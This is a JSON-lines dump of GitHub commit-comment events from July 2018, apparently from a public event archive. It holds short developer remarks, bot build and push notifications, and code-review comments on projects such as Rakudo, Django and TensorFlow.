{"id":"7953184188","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29678528,"position":null,"line":null,"path":null,"commit_id":"3d491d5821009901d769f8f22eb3a57b5017f3e9","created_at":"2018-07-11T23:51:51Z","updated_at":"2018-07-11T23:51:51Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [improve special matches](https://trello.com/c/UYCCrgfv/10-improve-special-matches)"}},"created_at":"2018-07-11T23:51:51Z"}
{"id":"7953184487","type":"CommitCommentEvent","actor":{"login":"rekk2"},"repo":{"name":"zixxcrypto/zixx-node-stratum-pool"},"payload":{"comment":{"id":29678529,"position":null,"line":null,"path":null,"commit_id":"81d2d8faaf268f07b7f650110e459f337208193c","created_at":"2018-07-11T23:51:58Z","updated_at":"2018-07-11T23:51:58Z","author_association":"NONE","body":"how to install on yiimp?"}},"created_at":"2018-07-11T23:51:58Z"}
{"id":"7953185191","type":"CommitCommentEvent","actor":{"login":"push-notifier[bot]"},"repo":{"name":"swinton/example"},"payload":{"comment":{"id":29678534,"position":null,"line":null,"path":null,"commit_id":"7a185f092a71a1c05b38d0b4cc0d522aa52fcfaf","created_at":"2018-07-11T23:52:14Z","updated_at":"2018-07-11T23:52:14Z","author_association":"NONE","body":"**[swinton/example] 7a185f09: Delete HEROKU.md**\n\nBranch: refs/heads/linter-alex\nHome:   https://github.com/swinton/example\nCommit: 7a185f092a71a1c05b38d0b4cc0d522aa52fcfaf\n    https://github.com/swinton/example/commit/7a185f092a71a1c05b38d0b4cc0d522aa52fcfaf\nAuthor: Steve Winton <swinton@users.noreply.github.com>\nDate:   2018-07-11T18:52:13-05:00 (Wed, 11 Jul 2018)\n\nChanged paths:\n  R HEROKU.md\n\nLog Message:\n-----------\nDelete HEROKU.md\n\nCompare: https://github.com/swinton/example/compare/a186875489c4...7a185f092a71\n"}},"created_at":"2018-07-11T23:52:14Z"}
{"id":"7953187799","type":"CommitCommentEvent","actor":{"login":"push-notifier[bot]"},"repo":{"name":"swinton/example"},"payload":{"comment":{"id":29678545,"position":null,"line":null,"path":null,"commit_id":"87c3d357b8813c025d2eefbcf1dc911d14c77a15","created_at":"2018-07-11T23:53:09Z","updated_at":"2018-07-11T23:53:09Z","author_association":"NONE","body":"**[swinton/example] 87c3d357: Create EXAMPLE.md**\n\nBranch: refs/heads/linter-alex\nHome:   https://github.com/swinton/example\nCommit: 87c3d357b8813c025d2eefbcf1dc911d14c77a15\n    https://github.com/swinton/example/commit/87c3d357b8813c025d2eefbcf1dc911d14c77a15\nAuthor: Steve Winton <swinton@users.noreply.github.com>\nDate:   2018-07-11T18:53:08-05:00 (Wed, 11 Jul 2018)\n\nChanged paths:\n  A EXAMPLE.md\n\nLog Message:\n-----------\nCreate EXAMPLE.md\n\nCompare: https://github.com/swinton/example/compare/7a185f092a71...87c3d357b881\n"}},"created_at":"2018-07-11T23:53:09Z"}
{"id":"7953190012","type":"CommitCommentEvent","actor":{"login":"b2gills"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":29678551,"position":null,"line":null,"path":null,"commit_id":"5682ee1f12b7063644ce41238aacd8a8286e37dd","created_at":"2018-07-11T23:54:00Z","updated_at":"2018-07-11T23:54:00Z","author_association":"CONTRIBUTOR","body":"I wonder if the following would pre-allocate the array\r\n\r\n```perl6\r\nnqp::setelems(self, nqp::add_i(nqp::sub_i($max,$val),1)),\r\nnqp::setelems(self, 0),\r\n```"}},"created_at":"2018-07-11T23:54:00Z"}
{"id":"7953194376","type":"CommitCommentEvent","actor":{"login":"diegozea"},"repo":{"name":"JuliaStats/StatsBase.jl"},"payload":{"comment":{"id":29678557,"position":2,"line":1,"path":"REQUIRE","commit_id":"7011b19028c0aa0ce2e7751ff926c1a381883b6b","created_at":"2018-07-11T23:55:37Z","updated_at":"2018-07-11T23:55:37Z","author_association":"CONTRIBUTOR","body":"Great! I guess the problem I found while I was trying to installing it, it's only because this hasn't been tagged yet. "}},"created_at":"2018-07-11T23:55:37Z"}
{"id":"7953200172","type":"CommitCommentEvent","actor":{"login":"intgr"},"repo":{"name":"jbinary/django"},"payload":{"comment":{"id":29678574,"position":5,"line":95,"path":"django/db/utils.py","commit_id":"568a4eb573c7fce2fdec2d1578b2db4f3d0e51fd","created_at":"2018-07-11T23:57:44Z","updated_at":"2018-07-11T23:57:44Z","author_association":"NONE","body":"`OperationalError` can have causes where the connection is still usable. So calling `close()` is overkill. Not sure about `InterfaceError`."}},"created_at":"2018-07-11T23:57:44Z"}
{"id":"7953204449","type":"CommitCommentEvent","actor":{"login":"push-notifier[bot]"},"repo":{"name":"swinton/example"},"payload":{"comment":{"id":29678584,"position":null,"line":null,"path":null,"commit_id":"fbba1748e0d837b20df0171f6eb0905cd4dad160","created_at":"2018-07-11T23:59:21Z","updated_at":"2018-07-11T23:59:21Z","author_association":"NONE","body":"**[swinton/example] fbba1748: Update EXAMPLE.md**\n\nBranch: refs/heads/linter-alex\nHome:   https://github.com/swinton/example\nCommit: fbba1748e0d837b20df0171f6eb0905cd4dad160\n    https://github.com/swinton/example/commit/fbba1748e0d837b20df0171f6eb0905cd4dad160\nAuthor: Steve Winton <swinton@users.noreply.github.com>\nDate:   2018-07-11T18:59:19-05:00 (Wed, 11 Jul 2018)\n\nChanged paths:\n  M EXAMPLE.md\n\nLog Message:\n-----------\nUpdate EXAMPLE.md\n\nCompare: https://github.com/swinton/example/compare/87c3d357b881...fbba1748e0d8\n"}},"created_at":"2018-07-11T23:59:21Z"}
{"id":"7953204763","type":"CommitCommentEvent","actor":{"login":"Altemio"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29678586,"position":null,"line":null,"path":null,"commit_id":"56e4a334505e2c3762ecadf2885f6d30b6376193","created_at":"2018-07-11T23:59:28Z","updated_at":"2018-07-11T23:59:28Z","author_association":"OWNER","body":"Did you confirm crashing?"}},"created_at":"2018-07-11T23:59:28Z"}
{"id":"7947481935","type":"CommitCommentEvent","actor":{"login":"surfdog9"},"repo":{"name":"surfdog9/tester"},"payload":{"comment":{"id":29665573,"position":null,"line":null,"path":null,"commit_id":"c62fb9454be1faed62cea7fbc6d558a946c832b3","created_at":"2018-07-11T03:02:44Z","updated_at":"2018-07-11T03:02:44Z","author_association":"OWNER","body":"This is a test repository"}},"created_at":"2018-07-11T03:02:44Z"}
{"id":"7947483510","type":"CommitCommentEvent","actor":{"login":"SteveEbey73742"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29665575,"position":null,"line":null,"path":null,"commit_id":"19db07f062fdf4c486f78e3201544f5cf5ac7f02","created_at":"2018-07-11T03:03:18Z","updated_at":"2018-07-11T03:03:18Z","author_association":"NONE","body":"Fedora lib files for programs follow the /usr/include/<nameofprogram>/<libfolder> and I have installed ffmpeg-4.0 so I wonder if that is the problem, my ffmpeg is too new?"}},"created_at":"2018-07-11T03:03:18Z"}
{"id":"7947488879","type":"CommitCommentEvent","actor":{"login":"SamarV-121"},"repo":{"name":"LineageOS-MediaTek/proprietary_vendor_motorola"},"payload":{"comment":{"id":29665583,"position":null,"line":null,"path":null,"commit_id":"756f3fe077148b1a6b879488ce3c8afa02c20902","created_at":"2018-07-11T03:05:19Z","updated_at":"2018-07-11T03:05:19Z","author_association":"MEMBER","body":":3"}},"created_at":"2018-07-11T03:05:19Z"}
{"id":"7947508940","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665602,"position":null,"line":null,"path":null,"commit_id":"d02926beb43245db510bbc167e34a77e73971e6e","created_at":"2018-07-11T03:12:46Z","updated_at":"2018-07-11T03:12:46Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/stylis-3.x.45`__ :crossed_fingers: [`renovate/stylis-3.x`](https://github.com/streamich/nano-css/tree/renovate/stylis-3.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/45) :tada:"}},"created_at":"2018-07-11T03:12:46Z"}
{"id":"7947508951","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665604,"position":null,"line":null,"path":null,"commit_id":"4b56986aeafe3c417c9df930c070a1ad2e804f83","created_at":"2018-07-11T03:12:46Z","updated_at":"2018-07-11T03:12:46Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/semantic-release-15.x.44`__ :crossed_fingers: [`renovate/semantic-release-15.x`](https://github.com/streamich/nano-css/tree/renovate/semantic-release-15.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/44) :tada:"}},"created_at":"2018-07-11T03:12:46Z"}
{"id":"7947509213","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665607,"position":null,"line":null,"path":null,"commit_id":"d67a5f68c67ed98d93d3ab8996cdf297585257b1","created_at":"2018-07-11T03:12:52Z","updated_at":"2018-07-11T03:12:52Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/tslib-1.x.46`__ :crossed_fingers: [`renovate/tslib-1.x`](https://github.com/streamich/nano-css/tree/renovate/tslib-1.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/46) :tada:"}},"created_at":"2018-07-11T03:12:52Z"}
{"id":"7947509514","type":"CommitCommentEvent","actor":{"login":"somallg"},"repo":{"name":"AnhThe8395/daily-challenge"},"payload":{"comment":{"id":29665608,"position":9,"line":40,"path":"src/daily-challenge-6.spec.js","commit_id":"3753f4d75cc9641a96b0808d1b66dfa4aa725634","created_at":"2018-07-11T03:12:58Z","updated_at":"2018-07-11T03:12:58Z","author_association":"NONE","body":"sử dụng destructuring để swap\r\n[ matrix[j][length - 1 - i],  matrix[length - 1 - i][length - 1 - j], matrix[length - 1 - j][i], matrix[i][j] ]  = [ matrix[i][j], matrix[j][length - 1 - i], matrix[length - 1 - i][length - 1 - j], matrix[length - 1 - j][i] ]"}},"created_at":"2018-07-11T03:12:58Z"}
{"id":"7947514138","type":"CommitCommentEvent","actor":{"login":"FishGeorge"},"repo":{"name":"FishGeorge/Study_FrontEnd"},"payload":{"comment":{"id":29665615,"position":null,"line":null,"path":null,"commit_id":"b408e27116d5116ac9635a3901ceed227a7b9aa9","created_at":"2018-07-11T03:14:41Z","updated_at":"2018-07-11T03:14:41Z","author_association":"OWNER","body":"想起来，之后应该把每一课的代码做成html，当做复习。"}},"created_at":"2018-07-11T03:14:41Z"}
{"id":"7947518372","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"SUPERNOT/firelotto"},"payload":{"comment":{"id":29665622,"position":null,"line":null,"path":null,"commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-11T03:16:12Z","updated_at":"2018-07-11T03:16:12Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-11T03:16:12Z"}
{"id":"7947523494","type":"CommitCommentEvent","actor":{"login":"theLearningChan"},"repo":{"name":"theLearningChan/railsSampleApp"},"payload":{"comment":{"id":29665628,"position":6,"line":6,"path":"test/controllers/static_pages_controller_test.rb","commit_id":"31636a9e87742104621cd52190abc2dbd2879cd0","created_at":"2018-07-11T03:18:05Z","updated_at":"2018-07-11T03:18:05Z","author_association":"OWNER","body":"@martinverdejo, why is the variable '@base_title' rather than 'base_title'?"}},"created_at":"2018-07-11T03:18:05Z"}
{"id":"7947526376","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29665633,"position":null,"line":null,"path":null,"commit_id":"5ac3f9387583d849bbe243749f07500720bd7ed2","created_at":"2018-07-11T03:19:10Z","updated_at":"2018-07-11T03:19:10Z","author_association":"OWNER","body":"\r\n#25 "}},"created_at":"2018-07-11T03:19:10Z"}
{"id":"7947527223","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"SUPERNOT/firelotto"},"payload":{"comment":{"id":29665634,"position":null,"line":null,"path":null,"commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-11T03:19:29Z","updated_at":"2018-07-11T03:19:29Z","author_association":"OWNER","body":"Yes, this is me, help me make it easier.Thank You\n"}},"created_at":"2018-07-11T03:19:29Z"}
{"id":"7947529414","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29665638,"position":null,"line":null,"path":null,"commit_id":"b63d1b5b3f079fa7b34e5387520b99ffd89cbfbb","created_at":"2018-07-11T03:20:19Z","updated_at":"2018-07-11T03:20:19Z","author_association":"OWNER","body":"#19 "}},"created_at":"2018-07-11T03:20:19Z"}
{"id":"7947530389","type":"CommitCommentEvent","actor":{"login":"rongjiecomputer"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29665639,"position":659,"line":1927,"path":"third_party/llvm/llvm.autogenerated.BUILD","commit_id":"add96c8632df9596a73bf637d6b7015e9c7beaad","created_at":"2018-07-11T03:20:43Z","updated_at":"2018-07-11T03:20:43Z","author_association":"CONTRIBUTOR","body":"One final change, please move `llvm_support_platform_specific_srcs_glob` out of `glob.include` and make `llvm_support_platform_specific_srcs_glob` itself a `glob`. `glob` function cannot accept `select` as argument, but `select` can accept `glob`, otherwise you will get the following Bazel error.\r\n\r\n```\r\nargument 'include' has type 'select', but should be 'sequence'\r\nin call to builtin function glob(include, *, exclude, exclude_directories)\r\n```\r\n\r\ntl;dr: `glob([...] + select(...))` is not allowed because `[...] + select(...)` has type of `select`. `glob(...) + glob(...)` is allowed.\r\n\r\nWhat I mean is:\r\n\r\n```\r\nsrcs = glob([....]) + llvm_support_platform_specific_srcs_glob,\r\n\r\nllvm_support_platform_specific_srcs_glob = glob([\r\n    \"lib/Support/Unix/*.inc\",\r\n    \"lib/Support/Unix/*.h\",\r\n])\r\n```\r\n\r\nThen I will be able to change it to:\r\n\r\n```\r\nllvm_support_platform_specific_srcs_glob = select({\r\n    \"@org_tensorflow//tensorflow:windows\": glob([\r\n        \"lib/Support/Windows/*.inc\",\r\n        \"lib/Support/Windows/*.h\"\r\n    ]),\r\n    \"//conditions:default\": glob([\r\n        \"lib/Support/Unix/*.inc\",\r\n        \"lib/Support/Unix/*.h\",\r\n    ]),\r\n})\r\n```\r\n\r\nWe are almost there, thank you for your hard work!"}},"created_at":"2018-07-11T03:20:43Z"}
{"id":"7947532708","type":"CommitCommentEvent","actor":{"login":"raylaijh"},"repo":{"name":"raylaijh/ansible_homework"},"payload":{"comment":{"id":29665646,"position":null,"line":null,"path":null,"commit_id":"5db61041766e20bd3a70d501c2c29cee05784a12","created_at":"2018-07-11T03:21:39Z","updated_at":"2018-07-11T03:21:39Z","author_association":"OWNER","body":"ansible.cfg for OSP provisioning"}},"created_at":"2018-07-11T03:21:39Z"}
{"id":"7947534508","type":"CommitCommentEvent","actor":{"login":"Lostknownah"},"repo":{"name":"Kevin16777216/Project2018"},"payload":{"comment":{"id":29665654,"position":null,"line":null,"path":null,"commit_id":"b4bc33fbbaae753a26dbc3505596c225241bcb0e","created_at":"2018-07-11T03:22:22Z","updated_at":"2018-07-11T03:22:22Z","author_association":"COLLABORATOR","body":"hi"}},"created_at":"2018-07-11T03:22:22Z"}
{"id":"7947536387","type":"CommitCommentEvent","actor":{"login":"AlexanderBlank"},"repo":{"name":"SlaybaughLab/BART"},"payload":{"comment":{"id":29665655,"position":null,"line":null,"path":null,"commit_id":"3c16d87a78ed24c46bc7e06443fdb2bfa924fd0e","created_at":"2018-07-11T03:23:07Z","updated_at":"2018-07-11T03:23:07Z","author_association":"NONE","body":"pushed to upstream instead of origin by mistake, sorry about this"}},"created_at":"2018-07-11T03:23:07Z"}
{"id":"7947554117","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"SUPERNOT/curly-octo-adventure"},"payload":{"comment":{"id":29665688,"position":null,"line":null,"path":null,"commit_id":"c9b3cf09970a1b30e8df04f84ab3cc0f270273d4","created_at":"2018-07-11T03:30:02Z","updated_at":"2018-07-11T03:30:02Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-11T03:30:02Z"}
{"id":"7947555282","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"SUPERNOT/curly-octo-adventure"},"payload":{"comment":{"id":29665694,"position":1,"line":1,"path":"README.md","commit_id":"c9b3cf09970a1b30e8df04f84ab3cc0f270273d4","created_at":"2018-07-11T03:30:25Z","updated_at":"2018-07-11T03:30:25Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-11T03:30:25Z"}
{"id":"7947557159","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665698,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T03:31:05Z","updated_at":"2018-07-11T03:31:05Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-11T03:31:05Z"}
{"id":"7947561160","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665707,"position":null,"line":null,"path":null,"commit_id":"8e299231ae22b084b442c498ef8b07ccfd313cf1","created_at":"2018-07-11T03:32:38Z","updated_at":"2018-07-11T03:32:38Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8e299231ae22b084b442c498ef8b07ccfd313cf1-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T03:32:38Z"}
{"id":"7947562647","type":"CommitCommentEvent","actor":{"login":"asmagsasp"},"repo":{"name":"asmagsasp/agendador-de-tarefas"},"payload":{"comment":{"id":29665708,"position":null,"line":null,"path":null,"commit_id":"3177a398c637f86bafbe120150e535d479b9478c","created_at":"2018-07-11T03:33:13Z","updated_at":"2018-07-11T03:33:13Z","author_association":"OWNER","body":"**Instalando o Bootstrap na versão 3**\r\n\r\nnpm install --save bootstrap@3"}},"created_at":"2018-07-11T03:33:13Z"}
{"id":"7947567714","type":"CommitCommentEvent","actor":{"login":"lm5645"},"repo":{"name":"lm5645/lm5645.github.io"},"payload":{"comment":{"id":29665719,"position":null,"line":null,"path":null,"commit_id":"2cbccd5839f7f046c9d77266a844f116f68ae569","created_at":"2018-07-11T03:35:14Z","updated_at":"2018-07-11T03:35:14Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-11T03:35:14Z"}
{"id":"7947570256","type":"CommitCommentEvent","actor":{"login":"drewsucksatlife"},"repo":{"name":"drewsucksatlife/iOS-PM"},"payload":{"comment":{"id":29665725,"position":null,"line":null,"path":null,"commit_id":"86caa14b99cf9dadf60a8a6bb2d591c76c2a46b8","created_at":"2018-07-11T03:36:15Z","updated_at":"2018-07-11T03:36:15Z","author_association":"OWNER","body":"creation*"}},"created_at":"2018-07-11T03:36:15Z"}
{"id":"7947573545","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29665731,"position":1,"line":null,"path":"1531280256.7/github_test.txt","commit_id":"08ecb8c04cec3c92ad2e283422128a55297bda7a","created_at":"2018-07-11T03:37:39Z","updated_at":"2018-07-11T03:37:39Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-11T03:37:39Z"}
{"id":"7947576085","type":"CommitCommentEvent","actor":{"login":"SUPERNOT"},"repo":{"name":"SUPERNOT/firelotto"},"payload":{"comment":{"id":29665740,"position":2,"line":2,"path":"README.md","commit_id":"707b21cb93c2a2a3428c551ca5e392049b650040","created_at":"2018-07-11T03:38:43Z","updated_at":"2018-07-11T03:38:43Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-11T03:38:43Z"}
{"id":"7947576463","type":"CommitCommentEvent","actor":{"login":"martinverdejo"},"repo":{"name":"theLearningChan/railsSampleApp"},"payload":{"comment":{"id":29665744,"position":6,"line":6,"path":"test/controllers/static_pages_controller_test.rb","commit_id":"31636a9e87742104621cd52190abc2dbd2879cd0","created_at":"2018-07-11T03:38:53Z","updated_at":"2018-07-11T03:38:53Z","author_association":"NONE","body":"`@base_title` makes it an instance variable, meaning you can reference it inside other methods inside this class, (e.g. line 13, 19, etc). Assigning it `base_title` without `@` makes it available only within the the method that declared it."}},"created_at":"2018-07-11T03:38:53Z"}
{"id":"7947583668","type":"CommitCommentEvent","actor":{"login":"fcocc77"},"repo":{"name":"fcocc77/cats_farm"},"payload":{"comment":{"id":29665760,"position":15,"line":286,"path":"code/utils/os.cpp","commit_id":"c5d12e9fc3afbfecd139cacda9a9b24df285b99f","created_at":"2018-07-11T03:41:50Z","updated_at":"2018-07-11T03:41:50Z","author_association":"OWNER","body":"el _file hay que ponerlo en dir( \"aqui\" )"}},"created_at":"2018-07-11T03:41:50Z"}
{"id":"7947584804","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29665762,"position":null,"line":null,"path":null,"commit_id":"51fe81e99a1097affe5e412f19980d8f601f11de","created_at":"2018-07-11T03:42:17Z","updated_at":"2018-07-11T03:42:17Z","author_association":"OWNER","body":"#26 "}},"created_at":"2018-07-11T03:42:17Z"}
{"id":"7947587801","type":"CommitCommentEvent","actor":{"login":"Easonwu2018"},"repo":{"name":"Easonwu2018/stock_system"},"payload":{"comment":{"id":29665765,"position":null,"line":null,"path":null,"commit_id":"8826fc03382c5773a3ec59d12f8bbfb8d6f82b56","created_at":"2018-07-11T03:43:25Z","updated_at":"2018-07-11T03:43:25Z","author_association":"OWNER","body":"股票系统，测试github"}},"created_at":"2018-07-11T03:43:25Z"}
{"id":"7947589770","type":"CommitCommentEvent","actor":{"login":"smileskydoge"},"repo":{"name":"smileskydoge/Afanty"},"payload":{"comment":{"id":29665767,"position":null,"line":null,"path":null,"commit_id":"2fafacc1f1cbc4ee3bb3c5ae43d4245b35dfbe56","created_at":"2018-07-11T03:44:15Z","updated_at":"2018-07-11T03:44:15Z","author_association":"OWNER","body":",,,"}},"created_at":"2018-07-11T03:44:15Z"}
{"id":"7947592352","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18006/programming-term2"},"payload":{"comment":{"id":29665774,"position":null,"line":null,"path":null,"commit_id":"a39aae54077b86b47231c6d2f77fb0d246cbc8df","created_at":"2018-07-11T03:45:18Z","updated_at":"2018-07-11T03:45:18Z","author_association":"NONE","body":"出題意図に沿った見やすいコードになっています。\r\n計算の過程も追いやすくていいですね。\r\n修正対応ありがとうございます!お疲れ様でした。"}},"created_at":"2018-07-11T03:45:18Z"}
{"id":"7947594199","type":"CommitCommentEvent","actor":{"login":"brentadamson"},"repo":{"name":"jivesearch/jivesearch"},"payload":{"comment":{"id":29665778,"position":null,"line":null,"path":null,"commit_id":"6098afa92130fe5cda297f5f1fd2f094977157cd","created_at":"2018-07-11T03:46:05Z","updated_at":"2018-07-11T03:46:05Z","author_association":"MEMBER","body":"#47 "}},"created_at":"2018-07-11T03:46:05Z"}
{"id":"7947594294","type":"CommitCommentEvent","actor":{"login":"KaoCC"},"repo":{"name":"KaoCC/AutoScript"},"payload":{"comment":{"id":29665779,"position":null,"line":null,"path":null,"commit_id":"558348ef6b518a07c44de2274917c8821b5bddc5","created_at":"2018-07-11T03:46:07Z","updated_at":"2018-07-11T03:46:07Z","author_association":"OWNER","body":"\r\n#27 "}},"created_at":"2018-07-11T03:46:07Z"}
{"id":"7947595352","type":"CommitCommentEvent","actor":{"login":"yangzhishuai"},"repo":{"name":"yangzhishuai/four-provider-shopxx"},"payload":{"comment":{"id":29665784,"position":null,"line":null,"path":null,"commit_id":"ad83643898a6f21ccb92391035e86b5f4eb7d5be","created_at":"2018-07-11T03:46:33Z","updated_at":"2018-07-11T03:46:33Z","author_association":"OWNER","body":"不错，表现很好"}},"created_at":"2018-07-11T03:46:33Z"}
{"id":"7947600991","type":"CommitCommentEvent","actor":{"login":"kobenaxie"},"repo":{"name":"kobenaxie/python2.7-offer"},"payload":{"comment":{"id":29665789,"position":null,"line":null,"path":null,"commit_id":"61817a47969701d25f081331f0385289fea8763e","created_at":"2018-07-11T03:48:53Z","updated_at":"2018-07-11T03:48:53Z","author_association":"OWNER","body":"两个队列实现栈"}},"created_at":"2018-07-11T03:48:53Z"}
{"id":"7947601414","type":"CommitCommentEvent","actor":{"login":"theLearningChan"},"repo":{"name":"theLearningChan/railsSampleApp"},"payload":{"comment":{"id":29665790,"position":6,"line":6,"path":"test/controllers/static_pages_controller_test.rb","commit_id":"31636a9e87742104621cd52190abc2dbd2879cd0","created_at":"2018-07-11T03:49:04Z","updated_at":"2018-07-11T03:49:04Z","author_association":"OWNER","body":"ahhhh got it. ty"}},"created_at":"2018-07-11T03:49:04Z"}
{"id":"7947602814","type":"CommitCommentEvent","actor":{"login":"weiengineering"},"repo":{"name":"weiengineering/ansible"},"payload":{"comment":{"id":29665791,"position":null,"line":null,"path":null,"commit_id":"6e5b5318ee64da7f0c2a7b7893a775f8ec976518","created_at":"2018-07-11T03:49:37Z","updated_at":"2018-07-11T03:49:37Z","author_association":"OWNER","body":"# aci-yml\r\n\r\n# Description\r\n\r\nThe Cisco ACI programmability model allows complete programmatic access to the application centric infrastructure. With this access, customers can integrate network deployment into management and monitoring tools and deploy new workloads programmatically.\r\n\r\nACI Fabric is configured using an abstract policy model on the Cisco Application Policy Infrastructure Controller (APIC). The APIC has a very rich and complete object model that is accessible through a programmatic REST API. The API accepts and returns HTTP or HTTPS messages that contain JavaScript Object Notation (JSON) or Extensible Markup Language (XML) documents. You can use any programming language to generate the messages and the JSON or XML documents that contain the API methods or managed object (MO) descriptions.\r\n\r\nIn addition to standard REST interface, Cisco provides several open source tools/frameworks to automate and program the APIC â€“ Python(uses acitoolkit library), ACI-REST, Puppet, Ansible etc."}},"created_at":"2018-07-11T03:49:37Z"}
{"id":"7947606683","type":"CommitCommentEvent","actor":{"login":"shivavelu"},"repo":{"name":"shivavelu/SfbayProject"},"payload":{"comment":{"id":29665796,"position":null,"line":null,"path":null,"commit_id":"f7f4de3843aea66fb9773b0ea9e56bc23e005869","created_at":"2018-07-11T03:51:12Z","updated_at":"2018-07-11T03:51:12Z","author_association":"OWNER","body":"add driver"}},"created_at":"2018-07-11T03:51:12Z"}
{"id":"7947607361","type":"CommitCommentEvent","actor":{"login":"shivavelu"},"repo":{"name":"shivavelu/SfbayProject"},"payload":{"comment":{"id":29665797,"position":null,"line":null,"path":null,"commit_id":"f7f4de3843aea66fb9773b0ea9e56bc23e005869","created_at":"2018-07-11T03:51:29Z","updated_at":"2018-07-11T03:51:29Z","author_association":"OWNER","body":"driver"}},"created_at":"2018-07-11T03:51:29Z"}
{"id":"7947608065","type":"CommitCommentEvent","actor":{"login":"PattyAppier"},"repo":{"name":"PattyAppier/1st-Repo-in-GitHub"},"payload":{"comment":{"id":29665799,"position":null,"line":null,"path":null,"commit_id":"9e37e3431a172ff2e8c60d03d6f91fd64248726c","created_at":"2018-07-11T03:51:47Z","updated_at":"2018-07-11T03:51:47Z","author_association":"OWNER","body":"hi, this try message is locked."}},"created_at":"2018-07-11T03:51:47Z"}
{"id":"7947609471","type":"CommitCommentEvent","actor":{"login":"it1011"},"repo":{"name":"talentui/project-template"},"payload":{"comment":{"id":29665800,"position":null,"line":null,"path":null,"commit_id":"98c525e90ba83120a00829011ea23f8cfe4a1ff1","created_at":"2018-07-11T03:52:24Z","updated_at":"2018-07-11T03:52:24Z","author_association":"CONTRIBUTOR","body":"#7 "}},"created_at":"2018-07-11T03:52:24Z"}
{"id":"7947609888","type":"CommitCommentEvent","actor":{"login":"WeiCY"},"repo":{"name":"WeiCY/WCYCategories"},"payload":{"comment":{"id":29665801,"position":null,"line":null,"path":null,"commit_id":"19b3f0bde8d6c7fc41ee19043e1521dcfd0d5313","created_at":"2018-07-11T03:52:35Z","updated_at":"2018-07-11T03:52:35Z","author_association":"OWNER","body":"新版本"}},"created_at":"2018-07-11T03:52:35Z"}
